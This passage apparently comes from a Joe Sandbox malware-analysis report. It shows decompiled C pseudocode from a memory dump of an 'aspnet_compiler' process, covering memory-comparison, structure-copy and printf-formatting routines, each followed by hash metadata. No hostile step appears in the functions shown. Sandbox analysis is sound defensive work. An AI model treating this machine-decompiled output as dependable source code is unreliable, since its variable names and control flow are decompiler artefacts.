                				void* _t311;
                				void* _t313;
                				void* _t315;
                				void* _t317;
                				void* _t319;
                				void* _t321;
                				void* _t322;
                
                				_t322 = __esi;
                				_t278 = __edx;
                				_t177 =  *(__esi - 0x1c);
                				if(_t177 ==  *(__edx - 0x1c)) {
                					_t228 = 0;
                					L10:
                					if(_t228 != 0) {
                						L78:
                						_t178 = _t228;
                						return _t178;
                					}
                					_t179 =  *(_t322 - 0x18);
                					if(_t179 ==  *(_t278 - 0x18)) {
                						_t228 = 0;
                						L21:
                						if(_t228 != 0) {
                							goto L78;
                						}
                						_t180 =  *(_t322 - 0x14);
                						if(_t180 ==  *(_t278 - 0x14)) {
                							_t228 = 0;
                							L32:
                							if(_t228 != 0) {
                								goto L78;
                							}
                							_t181 =  *(_t322 - 0x10);
                							if(_t181 ==  *(_t278 - 0x10)) {
                								_t228 = 0;
                								L43:
                								if(_t228 != 0) {
                									goto L78;
                								}
                								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
                									_t228 = 0;
                									L54:
                									if(_t228 != 0) {
                										goto L78;
                									}
                									_t183 =  *(_t322 - 8);
                									if(_t183 ==  *(_t278 - 8)) {
                										_t228 = 0;
                										L65:
                										if(_t228 != 0) {
                											goto L78;
                										}
                										_t184 =  *(_t322 - 4);
                										if(_t184 ==  *(_t278 - 4)) {
                											_t228 = 0;
                											L76:
                											if(_t228 == 0) {
                												_t228 = 0;
                											}
                											goto L78;
                										}
                										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
                										if(_t281 == 0) {
                											L69:
                											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
                											if(_t283 == 0) {
                												L71:
                												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
                												if(_t285 == 0) {
                													L73:
                													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
                													if(_t228 != 0) {
                														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                													}
                													goto L76;
                												}
                												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
                												if(_t228 != 0) {
                													goto L78;
                												}
                												goto L73;
                											}
                											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
                											if(_t228 != 0) {
                												goto L78;
                											}
                											goto L71;
                										}
                										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
                										if(_t228 != 0) {
                											goto L78;
                										}
                										goto L69;
                									}
                									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
                									if(_t287 == 0) {
                										L58:
                										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
                										if(_t289 == 0) {
                											L60:
                											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
                											if(_t291 == 0) {
                												L62:
                												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
                												if(_t228 != 0) {
                													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                												}
                												goto L65;
                											}
                											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
                											if(_t228 != 0) {
                												goto L78;
                											}
                											goto L62;
                										}
                										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
                										if(_t228 != 0) {
                											goto L78;
                										}
                										goto L60;
                									}
                									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
                									if(_t228 != 0) {
                										goto L78;
                									}
                									goto L58;
                								}
                								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
                								if(_t293 == 0) {
                									L47:
                									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
                									if(_t295 == 0) {
                										L49:
                										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
                										if(_t297 == 0) {
                											L51:
                											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
                											if(_t228 != 0) {
                												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                											}
                											goto L54;
                										}
                										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
                										if(_t228 != 0) {
                											goto L78;
                										}
                										goto L51;
                									}
                									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
                									if(_t228 != 0) {
                										goto L78;
                									}
                									goto L49;
                								}
                								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
                								if(_t228 != 0) {
                									goto L78;
                								}
                								goto L47;
                							}
                							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
                							if(_t299 == 0) {
                								L36:
                								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
                								if(_t301 == 0) {
                									L38:
                									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
                									if(_t303 == 0) {
                										L40:
                										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
                										if(_t228 != 0) {
                											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                										}
                										goto L43;
                									}
                									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
                									if(_t228 != 0) {
                										goto L78;
                									}
                									goto L40;
                								}
                								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
                								if(_t228 != 0) {
                									goto L78;
                								}
                								goto L38;
                							}
                							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
                							if(_t228 != 0) {
                								goto L78;
                							}
                							goto L36;
                						}
                						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
                						if(_t305 == 0) {
                							L25:
                							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
                							if(_t307 == 0) {
                								L27:
                								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
                								if(_t309 == 0) {
                									L29:
                									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
                									if(_t228 != 0) {
                										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                									}
                									goto L32;
                								}
                								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
                								if(_t228 != 0) {
                									goto L78;
                								}
                								goto L29;
                							}
                							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
                							if(_t228 != 0) {
                								goto L78;
                							}
                							goto L27;
                						}
                						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
                						if(_t228 != 0) {
                							goto L78;
                						}
                						goto L25;
                					}
                					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
                					if(_t311 == 0) {
                						L14:
                						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
                						if(_t313 == 0) {
                							L16:
                							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
                							if(_t315 == 0) {
                								L18:
                								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
                								if(_t228 != 0) {
                									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                								}
                								goto L21;
                							}
                							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
                							if(_t228 != 0) {
                								goto L78;
                							}
                							goto L18;
                						}
                						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
                						if(_t228 != 0) {
                							goto L78;
                						}
                						goto L16;
                					}
                					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
                					if(_t228 != 0) {
                						goto L78;
                					}
                					goto L14;
                				}
                				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
                				if(_t317 == 0) {
                					L3:
                					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
                					if(_t319 == 0) {
                						L5:
                						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
                						if(_t321 == 0) {
                							L7:
                							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
                							if(_t228 != 0) {
                								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
                							}
                							goto L10;
                						}
                						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
                						if(_t228 != 0) {
                							goto L78;
                						}
                						goto L7;
                					}
                					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
                					if(_t228 != 0) {
                						goto L78;
                					}
                					goto L5;
                				}
                				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
                				if(_t228 != 0) {
                					goto L78;
                				}
                				goto L3;
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction ID: a055fa05aba04ec1a546175f8f3573ad3e8fdc911b471be58b210e9afcaf92f7
                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction Fuzzy Hash: 4FC183322051930ADF2D8639C93503FBAB15AA57B171B676FD4B3CB2C5FE28C5389614
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E0041C46D(intOrPtr* __ecx, intOrPtr* __edx, void* __esi) {
                				void* __edi;
                				void* _t100;
                				void* _t102;
                				intOrPtr* _t220;
                				signed int _t226;
                				signed int _t231;
                				signed int _t234;
                				signed int _t239;
                				signed int _t242;
                				signed int _t245;
                				signed int _t249;
                				signed int _t252;
                				signed int _t262;
                				signed int _t272;
                				signed int _t275;
                				signed int _t278;
                				signed int _t281;
                				signed int _t284;
                				signed int _t287;
                				void* _t290;
                				intOrPtr _t292;
                				void* _t296;
                				signed int _t299;
                				void* _t303;
                				intOrPtr* _t304;
                				void* _t305;
                
                				_t296 = __esi;
                				_t264 = __edx;
                				_t220 = __ecx;
                				_t304 = __edx;
                				if(__ecx == 0 || __edx == 0) {
                					L14:
                					return 0xffffff53;
                				} else {
                					_t292 =  *((intOrPtr*)(_t305 + 0x10));
                					if( *((intOrPtr*)(__ecx + 4)) != 0 || _t292 != 0) {
                						_t222 =  *_t220;
                						if( *_t220 != 0) {
                							E0041F562(_t100, _t222, _t264, _t296);
                						}
                						_t102 = E0041C42F(_t304, 1);
                						if(_t102 < 0) {
                							return _t102;
                						} else {
                							 *_t220 = _t304;
                							_push(_t296);
                							 *((short*)(_t220 + 0x220)) =  *((intOrPtr*)( *_t304));
                							 *((short*)(_t220 + 0x388)) =  *((intOrPtr*)(_t304 + 0x80));
                							 *((intOrPtr*)(_t220 + 0x374)) =  *((intOrPtr*)(_t304 + 0x7c));
                							 *((intOrPtr*)(_t220 + 0x38c)) =  *((intOrPtr*)(_t304 + 0x84));
                							 *((intOrPtr*)(_t220 + 0x20c)) =  *((intOrPtr*)(_t304 + 0x78));
                							 *((intOrPtr*)(_t220 + 0x80)) =  *((intOrPtr*)(_t304 + 0x74));
                							_t226 = ( *( *_t304 + 2) & 3) << 0x00000004 |  *(_t220 + 0x310) & 0x0000ffcf;
                							 *(_t220 + 0x310) = _t226;
                							_t299 = ( *( *_t304 + 3) & 1) << 0x0000000a | _t226 & 0x0000fbff;
                							 *(_t220 + 0x310) = _t299;
                							 *((char*)(_t220 + 0x31d)) =  *((intOrPtr*)(_t304 + 0x60));
                							_t272 = ( *(_t304 + 0x5e) >> 0x00000002 & 1) << 0x00000008 |  *(_t220 + 0x312) & 0x0000feff;
                							 *(_t220 + 0x312) = _t272;
                							_t231 = ( *(_t304 + 0x5e) >> 0x00000003 & 1) << 0x00000009 | _t272 & 0x0000fdff;
                							 *(_t220 + 0x312) = _t231;
                							_t275 = ( *(_t304 + 0x5e) >> 0x00000004 & 1) << 0x0000000b | _t231 & 0x0000f7ff;
                							 *(_t220 + 0x312) = _t275;
                							_t234 = ( *(_t304 + 0x5e) >> 0x00000001 & 1) << 0x00000007 | _t275 & 0x0000ff7f;
                							 *(_t220 + 0x312) = _t234;
                							 *(_t220 + 0x312) = ( *(_t304 + 0x5e) >> 0x00000005 & 1) << 0x0000000c | _t234 & 0x0000efff;
                							 *((short*)(_t220 + 0x324)) =  *((intOrPtr*)(_t304 + 0x62));
                							 *((short*)(_t220 + 0x326)) =  *((intOrPtr*)(_t304 + 0x64));
                							 *((short*)(_t220 + 0x32a)) =  *((intOrPtr*)(_t304 + 0x66));
                							_t278 = ( *(_t304 + 0x5d) >> 0x00000004 & 1) << 0x00000002 | _t299 & 0x0000fffb;
                							 *(_t220 + 0x310) = _t278;
                							_t239 = ( *(_t304 + 0x5d) >> 0x00000005 & 1) << 0x00000003 | _t278 & 0x0000fff7;
                							 *(_t220 + 0x310) = _t239;
                							_t281 = ( *(_t304 + 0x5d) & 1) << 0x00000006 | _t239 & 0x0000ffbf;
                							 *(_t220 + 0x310) = _t281;
                							_t242 = ( *(_t304 + 0x5d) >> 0x00000001 & 1) << 0x00000007 | _t281 & 0x0000ff7f;
                							 *(_t220 + 0x310) = _t242;
                							_t284 = ( *(_t304 + 0x5d) >> 0x00000002 & 1) << 0x00000008 | _t242 & 0x0000feff;
                							 *(_t220 + 0x310) = _t284;
                							_t245 = ( *(_t304 + 0x5d) >> 0x00000003 & 1) << 0x00000009 | _t284 & 0x0000fdff;
                							 *(_t220 + 0x310) = _t245;
                							 *(_t220 + 0x310) =  *(_t304 + 0x5d) >> 0x00000006 & 0x000000ff | _t245 & 0x0000fffc;
                							_t249 = ( *(_t304 + 0x5e) >> 0x00000006 & 1) << 0x00000003 |  *(_t220 + 0x314) & 0x0000fff7;
                							 *(_t220 + 0x314) = _t249;
                							_t287 = ( *(_t304 + 0x5e) >> 0x00000007 & 0x000000ff) << 0x00000004 | _t249 & 0x0000ffef;
                							 *(_t220 + 0x314) = _t287;
                							_t252 = ( *(_t304 + 0x5f) & 1) << 0x00000006 | _t287 & 0x0000ffbf;
                							 *(_t220 + 0x314) = _t252;
                							_t290 = 1;
                							 *(_t220 + 0x314) = ( *(_t304 + 0x61) >> 0x00000005 & 1) << 0x0000000f | _t252 & 0x00007fff;
                							 *((intOrPtr*)(_t220 + 0x12c)) =  *((intOrPtr*)(_t304 + 0x24));
                							 *((intOrPtr*)(_t220 + 0x130)) =  *((intOrPtr*)(_t304 + 0x28));
                							 *((intOrPtr*)(_t220 + 0x134)) =  *((intOrPtr*)(_t304 + 0x2c));
                							 *((intOrPtr*)(_t220 + 0x138)) =  *((intOrPtr*)(_t304 + 0x30));
                							 *((intOrPtr*)(_t220 + 0x150)) =  *((intOrPtr*)(_t304 + 0x34));
                							 *((intOrPtr*)(_t220 + 0x164)) =  *((intOrPtr*)(_t304 + 0x38));
                							 *((intOrPtr*)(_t220 + 0x168)) =  *((intOrPtr*)(_t304 + 0x3c));
                							 *((intOrPtr*)(_t220 + 0x154)) =  *((intOrPtr*)(_t304 + 0x40));
                							 *(_t220 + 0x158) =  *(_t220 + 0x158) ^ ( *(_t220 + 0x158) ^  *(_t304 + 0x44)) & 0x0000007f;
                							 *(_t220 + 0x158) = ( *(_t304 + 0x44) ^  *(_t220 + 0x158)) & 0x0000007f ^  *(_t304 + 0x44);
                							 *((intOrPtr*)(_t220 + 0x15c)) =  *((intOrPtr*)(_t304 + 0x48));
                							 *((intOrPtr*)(_t220 + 0x160)) =  *((intOrPtr*)(_t304 + 0x4c));
                							if(_t292 == 0) {
                								_t303 =  *(_t304 + 0x54);
                								if(_t303 == 0) {
                									E00435760(_t292,  *(_t220 + 4), 0, 0x158);
                									_t290 = 1;
                								} else {
                									_t262 = 0x56;
                									memcpy( *(_t220 + 4), _t303, _t262 << 2);
                								}
                								if(( *(_t220 + 0x310) & 0x00000030) != 0x30) {
                									_t290 = E0041C3BF(_t220);
                								}
                							}
                							 *((intOrPtr*)(_t220 + 0x90)) =  *((intOrPtr*)(_t304 + 0x6c));
                							 *((intOrPtr*)(_t220 + 0x94)) =  *((intOrPtr*)(_t304 + 0x70));
                							 *((char*)(_t220 + 0x216)) =  *((intOrPtr*)(_t304 + 0x5c));
                							return _t290;
                						}
                					} else {
                						goto L14;
                					}
                				}
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c5db9ca4f1c5b09496bc3937c001735d70be4d77db350b6a7890b20243b6fb1c
                • Instruction ID: 7e825ff0f363f43f5b3a8908b9af69e6ff7e98779d5c53e4bf8ebeb1fa6b92c6
                • Opcode Fuzzy Hash: c5db9ca4f1c5b09496bc3937c001735d70be4d77db350b6a7890b20243b6fb1c
                • Instruction Fuzzy Hash: A5B183395142998ACB05EF68C4913F63BA1EF6A301F4850B9EC9CCF757D3398506EB64
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 83%
                			E0043CE28(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                				signed int _v8;
                				signed int _v12;
                				signed int _v16;
                				signed int _t52;
                				signed int _t54;
                				signed int _t55;
                				void* _t56;
                				signed char _t60;
                				signed char _t62;
                				signed int _t64;
                				void* _t65;
                				signed int _t66;
                				signed char _t75;
                				signed char _t78;
                				void* _t86;
                				void* _t88;
                				signed char _t90;
                				signed char _t92;
                				signed int _t93;
                				signed int _t96;
                				signed int _t98;
                				signed int _t99;
                				signed int _t103;
                				signed int* _t104;
                				void* _t106;
                				signed int _t112;
                				unsigned int _t114;
                				signed char _t116;
                				void* _t124;
                				unsigned int _t125;
                				void* _t126;
                				signed int _t127;
                				short _t128;
                				void* _t131;
                				void* _t133;
                				intOrPtr* _t135;
                				signed int _t136;
                				void* _t137;
                				void* _t139;
                				void* _t140;
                
                				_t126 = __edi;
                				_t52 =  *0x46f00c; // 0xd60a1515
                				_v8 = _t52 ^ _t136;
                				_t135 = __ecx;
                				_t103 = 0;
                				_t124 = 0x41;
                				_t54 =  *(__ecx + 0x32) & 0x0000ffff;
                				_t106 = 0x58;
                				_t139 = _t54 - 0x64;
                				if(_t139 > 0) {
                					__eflags = _t54 - 0x70;
                					if(__eflags > 0) {
                						_t55 = _t54 - 0x73;
                						__eflags = _t55;
                						if(_t55 == 0) {
                							L9:
                							_t56 = E0043D85A(_t135);
                							L10:
                							if(_t56 != 0) {
                								__eflags =  *((intOrPtr*)(_t135 + 0x30)) - _t103;
                								if( *((intOrPtr*)(_t135 + 0x30)) != _t103) {
                									L71:
                									L72:
                									return E004338BB(_v8 ^ _t136);
                								}
                								_t125 =  *(_t135 + 0x20);
                								_push(_t126);
                								_v16 = _t103;
                								_t60 = _t125 >> 4;
                								_v12 = _t103;
                								_t127 = 0x20;
                								__eflags = 1 & _t60;
                								if((1 & _t60) == 0) {
                									L46:
                									_t112 =  *(_t135 + 0x32) & 0x0000ffff;
                									__eflags = _t112 - 0x78;
                									if(_t112 == 0x78) {
                										L48:
                										_t62 = _t125 >> 5;
                										__eflags = _t62 & 0x00000001;
                										if((_t62 & 0x00000001) == 0) {
                											L50:
                											__eflags = 0;
                											L51:
                											__eflags = _t112 - 0x61;
                											if(_t112 == 0x61) {
                												L54:
                												_t64 = 1;
                												L55:
                												_t128 = 0x30;
                												__eflags = _t64;
                												if(_t64 != 0) {
                													L57:
                													_t65 = 0x58;
                													 *((short*)(_t136 + _t103 * 2 - 0xc)) = _t128;
                													__eflags = _t112 - _t65;
                													if(_t112 == _t65) {
                														L60:
                														_t66 = 1;
                														L61:
                														__eflags = _t66;
                														asm("cbw");
                														 *((short*)(_t136 + _t103 * 2 - 0xa)) = ((_t66 & 0xffffff00 | _t66 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                														_t103 = _t103 + 2;
                														__eflags = _t103;
                														L62:
                														_t131 =  *((intOrPtr*)(_t135 + 0x24)) -  *((intOrPtr*)(_t135 + 0x38)) - _t103;
                														__eflags = _t125 & 0x0000000c;
                														if((_t125 & 0x0000000c) == 0) {
                															E0043B40A(_t135 + 0x448, 0x20, _t131, _t135 + 0x18);
                															_t137 = _t137 + 0x10;
                														}
                														E0043DEE5(_t135 + 0x448,  &_v16, _t103, _t135 + 0x18,  *((intOrPtr*)(_t135 + 0xc)));
                														_t114 =  *(_t135 + 0x20);
                														_t104 = _t135 + 0x18;
                														_t75 = _t114 >> 3;
                														__eflags = _t75 & 0x00000001;
                														if((_t75 & 0x00000001) != 0) {
                															_t116 = _t114 >> 2;
                															__eflags = _t116 & 0x00000001;
                															if((_t116 & 0x00000001) == 0) {
                																E0043B40A(_t135 + 0x448, 0x30, _t131, _t104);
                																_t137 = _t137 + 0x10;
                															}
                														}
                														E0043DCB0(_t135, 0);
                														__eflags =  *_t104;
                														if( *_t104 >= 0) {
                															_t78 =  *(_t135 + 0x20) >> 2;
                															__eflags = _t78 & 0x00000001;
                															if((_t78 & 0x00000001) != 0) {
                																E0043B40A(_t135 + 0x448, 0x20, _t131, _t104);
                															}
                														}
                														goto L71;
                													}
                													_t86 = 0x41;
                													__eflags = _t112 - _t86;
                													if(_t112 == _t86) {
                														goto L60;
                													}
                													_t66 = 0;
                													goto L61;
                												}
                												__eflags = _t64;
                												if(_t64 == 0) {
                													goto L62;
                												}
                												goto L57;
                											}
                											_t133 = 0x41;
                											__eflags = _t112 - _t133;
                											if(_t112 == _t133) {
                												goto L54;
                											}
                											_t64 = 0;
                											goto L55;
                										}
                										goto L51;
                									}
                									_t88 = 0x58;
                									__eflags = _t112 - _t88;
                									if(_t112 != _t88) {
                										goto L50;
                									}
                									goto L48;
                								}
                								_t90 = _t125 >> 6;
                								__eflags = 1 & _t90;
                								if((1 & _t90) == 0) {
                									__eflags = 1 & _t125;
                									if((1 & _t125) == 0) {
                										_t92 = _t125 >> 1;
                										__eflags = 1 & _t92;
                										if((1 & _t92) == 0) {
                											goto L46;
                										}
                										_v16 = _t127;
                										L45:
                										_t103 = 1;
                										goto L46;
                									}
                									_push(0x2b);
                									L40:
                									_pop(_t93);
                									_v16 = _t93;
                									goto L45;
                								}
                								_push(0x2d);
                								goto L40;
                							}
                							L11:
                							goto L72;
                						}
                						_t96 = _t55;
                						__eflags = _t96;
                						if(__eflags == 0) {
                							L28:
                							_push(_t103);
                							_push(0xa);
                							L29:
                							_t56 = E0043D5F2(_t135, _t126, __eflags);
                							goto L10;
                						}
                						__eflags = _t96 - 3;
                						if(__eflags != 0) {
                							goto L11;
                						}
                						_push(0);
                						L13:
                						_push(0x10);
                						goto L29;
                					}
                					if(__eflags == 0) {
                						_t56 = E0043D7CF(__ecx);
                						goto L10;
                					}
                					__eflags = _t54 - 0x67;
                					if(_t54 <= 0x67) {
                						L30:
                						_t56 = E0043D358(_t103, _t135);
                						goto L10;
                					}
                					__eflags = _t54 - 0x69;
                					if(_t54 == 0x69) {
                						L27:
                						_t3 = _t135 + 0x20;
                						 *_t3 =  *(_t135 + 0x20) | 0x00000010;
                						__eflags =  *_t3;
                						goto L28;
                					}
                					__eflags = _t54 - 0x6e;
                					if(_t54 == 0x6e) {
                						_t56 = E0043D73C(__ecx, _t124);
                						goto L10;
                					}
                					__eflags = _t54 - 0x6f;
                					if(_t54 != 0x6f) {
                						goto L11;
                					}
                					_t56 = E0043D7B0(__ecx);
                					goto L10;
                				}
                				if(_t139 == 0) {
                					goto L27;
                				}
                				_t140 = _t54 - _t106;
                				if(_t140 > 0) {
                					_t98 = _t54 - 0x5a;
                					__eflags = _t98;
                					if(_t98 == 0) {
                						_t56 = E0043D19B(__ecx);
                						goto L10;
                					}
                					_t99 = _t98 - 7;
                					__eflags = _t99;
                					if(_t99 == 0) {
                						goto L30;
                					}
                					__eflags = _t99;
                					if(__eflags != 0) {
                						goto L11;
                					}
                					L17:
                					_t56 = E0043D55A(_t135, __eflags, _t103);
                					goto L10;
                				}
                				if(_t140 == 0) {
                					_push(1);
                					goto L13;
                				}
                				if(_t54 == _t124) {
                					goto L30;
                				}
                				if(_t54 == 0x43) {
                					goto L17;
                				}
                				if(_t54 <= 0x44) {
                					goto L11;
                				}
                				if(_t54 <= 0x47) {
                					goto L30;
                				}
                				if(_t54 != 0x53) {
                					goto L11;
                				}
                				goto L9;
                			}

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c304fa1241f2167d175a72178ec03e6d31472f49922fbde597fc92f990b6398b
                • Instruction ID: 3669a4fafa20d8c219774ebe753aac7cf543434df3b4a1aec9738dd85a4d98ed
                • Opcode Fuzzy Hash: c304fa1241f2167d175a72178ec03e6d31472f49922fbde597fc92f990b6398b
                • Instruction Fuzzy Hash: 4C614371A0070866DA385A2898C6BBF7396EB0DB48F14351BE842FB3C1C65DAD46875E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 88%
                			E0043C76D(intOrPtr* __ecx) {
                				char _v6;
                				char _v8;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				char _t49;
                				signed int _t50;
                				void* _t51;
                				signed char _t54;
                				signed char _t56;
                				signed int _t57;
                				signed int _t58;
                				signed char _t67;
                				signed char _t69;
                				signed char _t71;
                				signed char _t80;
                				signed char _t82;
                				signed int _t84;
                				signed int _t86;
                				signed int _t87;
                				signed char _t92;
                				void* _t95;
                				intOrPtr _t100;
                				unsigned int _t102;
                				signed char _t104;
                				void* _t112;
                				unsigned int _t113;
                				void* _t114;
                				signed int _t115;
                				signed int* _t116;
                				intOrPtr* _t119;
                				void* _t121;
                				void* _t122;
                				void* _t124;
                				void* _t125;
                
                				_push(__ecx);
                				_t119 = __ecx;
                				_t92 = 1;
                				_t49 =  *((char*)(__ecx + 0x31));
                				_t124 = _t49 - 0x64;
                				if(_t124 > 0) {
                					__eflags = _t49 - 0x70;
                					if(__eflags > 0) {
                						_t50 = _t49 - 0x73;
                						__eflags = _t50;
                						if(_t50 == 0) {
                							L9:
                							_t51 = E0043D7E7(_t119);
                							L10:
                							if(_t51 != 0) {
                								__eflags =  *((char*)(_t119 + 0x30));
                								if( *((char*)(_t119 + 0x30)) == 0) {
                									_t113 =  *(_t119 + 0x20);
                									_push(_t114);
                									_v8 = 0;
                									_t115 = 0;
                									_v6 = 0;
                									_t54 = _t113 >> 4;
                									__eflags = _t92 & _t54;
                									if((_t92 & _t54) == 0) {
                										L46:
                										_t100 =  *((intOrPtr*)(_t119 + 0x31));
                										__eflags = _t100 - 0x78;
                										if(_t100 == 0x78) {
                											L48:
                											_t56 = _t113 >> 5;
                											__eflags = _t92 & _t56;
                											if((_t92 & _t56) != 0) {
                												L50:
                												__eflags = _t100 - 0x61;
                												if(_t100 == 0x61) {
                													L53:
                													_t57 = 1;
                													L54:
                													__eflags = _t92;
                													if(_t92 != 0) {
                														L56:
                														 *((char*)(_t121 + _t115 - 4)) = 0x30;
                														__eflags = _t100 - 0x58;
                														if(_t100 == 0x58) {
                															L59:
                															_t58 = 1;
                															L60:
                															__eflags = _t58;
                															 *((char*)(_t121 + _t115 - 3)) = ((_t58 & 0xffffff00 | _t58 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x78;
                															_t115 = _t115 + 2;
                															__eflags = _t115;
                															L61:
                															_t95 =  *((intOrPtr*)(_t119 + 0x24)) -  *((intOrPtr*)(_t119 + 0x38)) - _t115;
                															__eflags = _t113 & 0x0000000c;
                															if((_t113 & 0x0000000c) == 0) {
                																E0043B381(_t119 + 0x448, 0x20, _t95, _t119 + 0x18);
                																_t122 = _t122 + 0x10;
                															}
                															E0043DD3B(_t119 + 0x448,  &_v8, _t115, _t119 + 0x18,  *((intOrPtr*)(_t119 + 0xc)));
                															_t102 =  *(_t119 + 0x20);
                															_t116 = _t119 + 0x18;
                															_t67 = _t102 >> 3;
                															__eflags = _t67 & 0x00000001;
                															if((_t67 & 0x00000001) != 0) {
                																_t104 = _t102 >> 2;
                																__eflags = _t104 & 0x00000001;
                																if((_t104 & 0x00000001) == 0) {
                																	E0043B381(_t119 + 0x448, 0x30, _t95, _t116);
                																	_t122 = _t122 + 0x10;
                																}
                															}
                															E0043DAD7(_t95, _t119, _t116, _t119, 0);
                															__eflags =  *_t116;
                															if( *_t116 >= 0) {
                																_t71 =  *(_t119 + 0x20) >> 2;
                																__eflags = _t71 & 0x00000001;
                																if((_t71 & 0x00000001) != 0) {
                																	E0043B381(_t119 + 0x448, 0x20, _t95, _t116);
                																}
                															}
                															_t69 = 1;
                															L70:
                															return _t69;
                														}
                														__eflags = _t100 - 0x41;
                														if(_t100 == 0x41) {
                															goto L59;
                														}
                														_t58 = 0;
                														goto L60;
                													}
                													__eflags = _t57;
                													if(_t57 == 0) {
                														goto L61;
                													}
                													goto L56;
                												}
                												__eflags = _t100 - 0x41;
                												if(_t100 == 0x41) {
                													goto L53;
                												}
                												_t57 = 0;
                												goto L54;
                											}
                											L49:
                											_t92 = 0;
                											__eflags = 0;
                											goto L50;
                										}
